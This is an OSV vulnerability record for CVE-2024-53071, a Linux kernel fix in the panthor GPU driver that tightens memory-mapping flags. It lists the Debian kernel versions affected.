CVE-2024-53071

Source
https://nvd.nist.gov/vuln/detail/CVE-2024-53071
Import Source
https://storage.googleapis.com/osv-test-cve-osv-conversion/osv-output/CVE-2024-53071.json
JSON Data
https://api.test.osv.dev/v1/vulns/CVE-2024-53071
Related
Published
2024-11-19T18:15:26Z
Modified
2024-11-23T23:48:25.790831Z
Summary
[none]
Details

In the Linux kernel, the following vulnerability has been resolved:

drm/panthor: Be stricter about IO mapping flags

The current panthordevicemmap_io() implementation has two issues:

  1. For mapping DRMPANTHORUSERFLUSHIDMMIOOFFSET, panthordevicemmapio() bails if VMWRITE is set, but does not clear VMMAYWRITE. That means userspace can use mprotect() to make the mapping writable later on. This is a classic Linux driver gotcha. I don't think this actually has any impact in practice: When the GPU is powered, writes to the FLUSHID seem to be ignored; and when the GPU is not powered, the dummylatestflush page provided by the driver is deliberately designed to not do any flushes, so the only thing writing to the dummylatestflush could achieve would be to make more flushes happen.

  2. panthordevicemmapio() does not block MAPPRIVATE mappings (which are mappings without the VMSHARED flag). MAPPRIVATE in combination with VMMAYWRITE indicates that the VMA has copy-on-write semantics, which for VMPFNMAP are semi-supported but fairly cursed. In particular, in such a mapping, the driver can only install PTEs during mmap() by calling remappfnrange() (because remappfnrange() wants to store the physical address of the mapped physical memory into the vmpgoff of the VMA); installing PTEs later on with a fault handler (as panthor does) is not supported in private mappings, and so if you try to fault in such a mapping, vmfinsertpfnprot() splats when it hits a BUG() check.

Fix it by clearing the VMMAYWRITE flag (userspace writing to the FLUSHID doesn't make sense) and requiring VMSHARED (copy-on-write semantics for the FLUSHID don't make sense).

Reproducers for both scenarios are in the notes of my patch on the mailing list; I tested that these bugs exist on a Rock 5B machine.

Note that I only compile-tested the patch, I haven't tested it; I don't have a working kernel build setup for the test machine yet. Please test it before applying it.

References

Affected packages

Debian:13 / linux

Package

Name
linux
Purl
pkg:deb/debian/linux?arch=source

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
6.11.9-1

Affected versions

6.*

6.1.27-1
6.1.37-1
6.1.38-1
6.1.38-2~bpo11+1
6.1.38-2
6.1.38-3
6.1.38-4~bpo11+1
6.1.38-4
6.1.52-1
6.1.55-1~bpo11+1
6.1.55-1
6.1.64-1
6.1.66-1
6.1.67-1
6.1.69-1~bpo11+1
6.1.69-1
6.1.76-1~bpo11+1
6.1.76-1
6.1.82-1
6.1.85-1
6.1.90-1~bpo11+1
6.1.90-1
6.1.94-1~bpo11+1
6.1.94-1
6.1.98-1
6.1.99-1
6.1.106-1
6.1.106-2
6.1.106-3
6.1.112-1
6.1.115-1
6.3.1-1~exp1
6.3.2-1~exp1
6.3.4-1~exp1
6.3.5-1~exp1
6.3.7-1~bpo12+1
6.3.7-1
6.3.11-1
6.4~rc6-1~exp1
6.4~rc7-1~exp1
6.4.1-1~exp1
6.4.4-1~bpo12+1
6.4.4-1
6.4.4-2
6.4.4-3~bpo12+1
6.4.4-3
6.4.11-1
6.4.13-1
6.5~rc4-1~exp1
6.5~rc6-1~exp1
6.5~rc7-1~exp1
6.5.1-1~exp1
6.5.3-1~bpo12+1
6.5.3-1
6.5.6-1
6.5.8-1
6.5.10-1~bpo12+1
6.5.10-1
6.5.13-1
6.6.3-1~exp1
6.6.4-1~exp1
6.6.7-1~exp1
6.6.8-1
6.6.9-1
6.6.11-1
6.6.13-1~bpo12+1
6.6.13-1
6.6.15-1
6.6.15-2
6.7-1~exp1
6.7.1-1~exp1
6.7.4-1~exp1
6.7.7-1
6.7.9-1
6.7.9-2
6.7.12-1~bpo12+1
6.7.12-1
6.8.9-1
6.8.11-1
6.8.12-1~bpo12+1
6.8.12-1
6.9.2-1~exp1
6.9.7-1~bpo12+1
6.9.7-1
6.9.8-1
6.9.9-1
6.9.10-1~bpo12+1
6.9.10-1
6.9.11-1
6.9.12-1
6.10-1~exp1
6.10.1-1~exp1
6.10.3-1
6.10.4-1
6.10.6-1~bpo12+1
6.10.6-1
6.10.7-1
6.10.9-1
6.10.11-1~bpo12+1
6.10.11-1
6.10.12-1
6.11~rc4-1~exp1
6.11~rc5-1~exp1
6.11-1~exp1
6.11.2-1
6.11.4-1
6.11.5-1~bpo12+1
6.11.5-1
6.11.6-1
6.11.7-1

Ecosystem specific

{
    "urgency": "not yet assigned"
}